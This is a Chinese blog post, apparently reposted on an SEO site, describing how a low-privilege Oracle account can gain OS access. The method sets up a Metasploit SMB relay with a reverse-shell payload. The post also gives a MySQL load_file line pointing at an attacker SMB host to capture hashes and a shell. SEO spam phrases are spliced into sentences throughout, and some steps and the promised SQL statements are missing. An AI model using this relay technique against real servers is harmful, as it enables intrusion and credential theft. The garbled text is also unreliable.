Oracle 低权限数据库账户得到 OS 访问权限 提权利
导读:1建站知识大概意思就是说,如果 ORACLE 服务是用 administrator 账户启动的,你只要有一个具有 resource 和 connect 权限的数据库账户,网站优化seo培训seo网站优化培训。
这几天看了篇叫"Penetration: from ap网站建设plication down to OS (Oracle)"的文档,感觉挺有意思的,文档的 大概意思就是说,如果 ORACLE 服务是用 administrator 账户启动的,你只要有一个具有 resource 和 connect 权限的数据库账户,就能利用 metasploit 的 smbrelay 功能,本地搭建一个 SMB 欺骗服务器, 来得到系统的访问权限。我本地测试了下,还真的成功了。:-)
具体的原理分析看原文吧,我这里把我的测试过程写出来.
我的渗透环境用的是 ubuntu8.10+metasploit 3.3 dev,oracle 数据库版本为 10.2.0.1.0,服务启动权限为 administrator,数据库账户用的是如何seo优化推广网站 dbsnmp 账户的默认权限.
1网站seo优化课程.先用 netstat 命令查看一下,本地的 139 端口有没有占用,一般占用此端口的服务就是 Samba 了,要关掉。ubuntu 的关闭方法是 sudo /etc/init.d/samba stop<p>
2.运行 metasploit,我选用的 PAYLOAD 是 shell_reverse_tcp,做好相应配置后,exploit.就能用 netstat 看到本地已经监听了 139 和 8522 端口了.
4.然后执行下面 3 条 SQL 语句
mysql,如果服务也是 administrator 启动的,用select load_file('\\\\192.168.1.52\mk.txt')也是可以得到系统权限的.MSSQL 应该用 xp_dirtree 存储过程 也是可以的,不过我没有配置出来用 administrator 账户启动 MSSQL 服务,希望知道的朋友指点下我。
这个技术可以用到内网 WEB 评估的时候,如果有注入,服务又是 administrator 启动的,可以提权了。
两个PDF下载,
作者:Mickey(Oracle%20database).pdf
当执行完 create index 这句的时候,在看咱们本地的 metasploit,就已经得到 ORACLE 数据库主机的系 统当前服务用户的 half lm 哈希和 cmdshell 了。
相关网站优化seo培训seo网站优化培训。声明: 本文由我的SEOUC技术文章主页发布于:2023-05-22 ,文章Oracle 低权限数据库账户得到 OS 访问权限 提权利主要讲述账户,访问权限,Oracle 低权限数据库账户得到 OS 访网站建设源码以及服务器配置搭建相关技术文章。转载请保留链接: https://www.seouc.com/article/web_4984.html